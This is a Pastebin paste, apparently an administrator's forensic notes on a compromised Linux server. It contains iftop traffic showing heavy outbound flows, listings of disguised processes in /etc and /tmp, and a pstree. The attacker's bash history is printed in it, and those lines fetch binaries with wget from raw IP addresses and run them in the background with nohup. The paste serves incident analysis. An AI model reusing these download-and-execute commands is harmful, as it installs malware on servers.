API tools faq
paste
Advertisement
Guest User

virus analyse

a guest
Aug 26th, 2014
441
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.18 KB | None | 0 0
raw download clone embed print report
  1. 1.history 记录
  2. 1 passwd
  3. 2 wget http://183.56.168.220:8080/TSmww
  4. 3 chmod 0755 /root/TSmww
  5. 4 nohup /root/TSmww > /dev/null 2>&1 &
  6. 5 ifconfig
  7. 6 chmod 0755 /root/TSmww
  8. 7 nohup /root/TSmww > /dev/null 2>&1 &
  9. 8 chmod 0755 /root/TSmww
  10. 9 nohup /root/TSmww > /dev/null 2>&1 &
  11. 10 wget http://183.60.202.61:8082/ymso
  12. 11 chmod 0755 ymso
  13. 12 ./ymso &
  14. 13 chmod 0755 ymso
  15. 14 ./ymso &
  16.  
  17. 2.查看文件
  18. root@140322in04:~# ls -l
  19. total 1120
  20. -rw-r--r-- 1 root root 69 Aug 26 03:14 conf.n
  21. -rwxr-xr-x 1 root root 1135000 Aug 19 18:41 ymso
  22.  
  23. 3.web登录页面后台记录
  24. 没有异常
  25.  
  26. 4.iftop流量分析
  27. 140322in04 => 110.50.234.209 511kb 540kb 540kb
  28. <= 22.2kb 22.3kb 22.3kb
  29. 140322in04 => 110.50.237.157 511kb 539kb 539kb
  30. <= 22.2kb 22.2kb 22.2kb
  31. 140322in04 => 114.141.73.125 503kb 537kb 537kb
  32. <= 21.3kb 21.5kb 21.5kb
  33. 140322in04 => 110.50.234.201 508kb 537kb 537kb
  34. <= 19.4kb 20.1kb 20.1kb
  35. 140322in04 => 110.50.234.210 507kb 536kb 536kb
  36. <= 18.6kb 19.2kb 19.2kb
  37. 140322in04 => 110.50.227.153 502kb 533kb 533kb
  38. <= 16.3kb 17.2kb 17.2kb
  39. 140322in04 => 110.50.230.44 497kb 525kb 525kb
  40. <= 7.56kb 6.88kb 6.88kb
  41. 140322in04 => 110.50.230.55 496kb 525kb 525kb
  42. <= 6.36kb 5.61kb 5.61kb
  43. 140322in04 => 110.50.230.39 493kb 522kb 522kb
  44. <= 7.05kb 5.67kb 5.67kb
  45. 140322in04 => 110.50.230.21 445kb 470kb 470kb
  46. <= 5.84kb 5.21kb 5.21kb
  47. 140322in04 => 110.50.230.30 43.3kb 51.7kb 51.7kb
  48. <= 0b 0b 0b
  49. 140322in04 => 107.150.42.203 3.52kb 3.83kb 3.83kb
  50. <= 2.34kb 2.55kb 2.55kb
  51. 140322in04 => ec2-54-215-6-163.us-west-1.compute.amazonaws.com 5.91kb 5.42kb 5.42kb
  52. <= 416b 347b 347b
  53. 140322in04 => google-public-dns-a.google.com 0b 1.60kb 1.60kb
  54. <= 0b 3.09kb 3.09kb
  55.  
  56.  
  57.  
  58. 4.可疑的进程:
  59. root 16533 0.0 1.0 1018648 2640 ? Ss Aug22 0:00 /etc/nhgbhhj
  60. root 17324 0.0 1.0 1018648 2640 ? S Aug22 0:05 /etc/nhgbhhj
  61. root 17326 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  62. root 17327 0.0 1.0 1018648 2640 ? S Aug22 0:54 /etc/nhgbhhj
  63. root 17328 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  64. root 17329 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  65. root 17330 0.0 1.0 1018648 2640 ? S Aug22 0:07 /etc/nhgbhhj
  66. root 17331 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  67. root 17332 0.0 1.0 1018648 2640 ? S Aug22 1:06 /etc/nhgbhhj
  68.  
  69. root 15979 0.0 0.2 9180 564 ? Ss 07:05 0:00 /tmp/.sshdd1409051099
  70. root 3766 0.0 0.0 980 128 ? Ss Aug22 0:38 /etc/.SSHH2
  71. root 3803 0.0 0.0 980 156 ? Ss Aug22 0:37 /etc/.SSH2
  72. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
  73. root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:18 /tmp/gdmorpen
  74. root 2372 0.4 0.3 105924 1024 ? Ssl 06:41 0:08 /tmp/sfewfesfs
  75. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
  76.  
  77.  
  78. root 19092 0.2 0.6 431804 1828 ? Ssl Aug25 2:08 /etc/gdmorpen
  79. root 19120 0.2 0.6 431804 1824 ? Ssl Aug25 2:08 /etc/smarvtd
  80. root 19121 0.2 0.6 431804 1828 ? Ssl Aug25 2:14 /etc/whitptabil
  81. root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:15 /tmp/gdmorpen
  82. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:14 /tmp/smarvtd
  83. root 19560 0.1 0.4 109128 1084 ? Ssl Aug25 1:50 /etc/sfewfesf
  84. root 2869 0.0 0.2 11716 544 ? Ssl 06:41 0:00 /usr/bin/.sshd
  85.  
  86. 5.stat 查询文件
  87. root@140322in04:/run# ls -l /etc/gdmorpen
  88. -rwsrwsrwt 1 root root 487672 Jul 28 03:58 /etc/gdmorpen
  89. root@140322in04:/run# stat /etc/gdmorpen
  90. File: ‘/etc/gdmorpen’
  91. Size: 487672 Blocks: 968 IO Block: 4096 regular file
  92. Device: 917bh/37243d Inode: 75497505 Links: 1
  93. Access: (7777/-rwsrwsrwt) Uid: ( 0/ root) Gid: ( 0/ root)
  94. Access: 2014-08-25 14:40:57.000000000 -0400
  95. Modify: 2014-07-28 03:58:15.000000000 -0400
  96. Change: 2014-08-25 14:40:54.000000000 -0400
  97. Birth: -
  98.  
  99.  
  100.  
  101. 6.杀死很多/etc/ /tmp程序后,pstree列表
  102. init─┬─.SSH2───sh───ps───sh───ps
  103. ├─.SSHH2───sh
  104. ├─.sshdd140905177───.sshdd140905177─┬─.sshdd140905177───sh───ps───ps
  105. │ └─3*[.sshdd140905177]
  106. ├─.sshhdd14087083───.sshhdd14087083─┬─4*[.sshhdd14087083]
  107. │ └─2*[.sshhdd14087083───sh]
  108. ├─.sshhdd14087083───.sshhdd14087083─┬─7*[.sshhdd14087083]
  109. │ ├─.sshhdd14087083───sh
  110. │ └─.sshhdd14087083───2*[sh]
  111. ├─agent───7*[{agent}]
  112. ├─cron
  113. ├─2*[getty]
  114. ├─getty───8*[{getty}]
  115. ├─kthreadd/662───khelper/662
  116. ├─master─┬─pickup
  117. │ ├─qmgr
  118. │ └─tlsmgr
  119. ├─rsyslogd───2*[{rsyslogd}]
  120. ├─saslauthd───saslauthd
  121. ├─screen───bash
  122. ├─sshd───sshd───bash───pstree
  123. ├─systemd-udevd
  124. ├─upstart-file-br
  125. ├─upstart-socket-
  126. ├─upstart-udev-br
  127. ├─whitptabil───42*[{whitptabil}]
  128. └─xinetd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!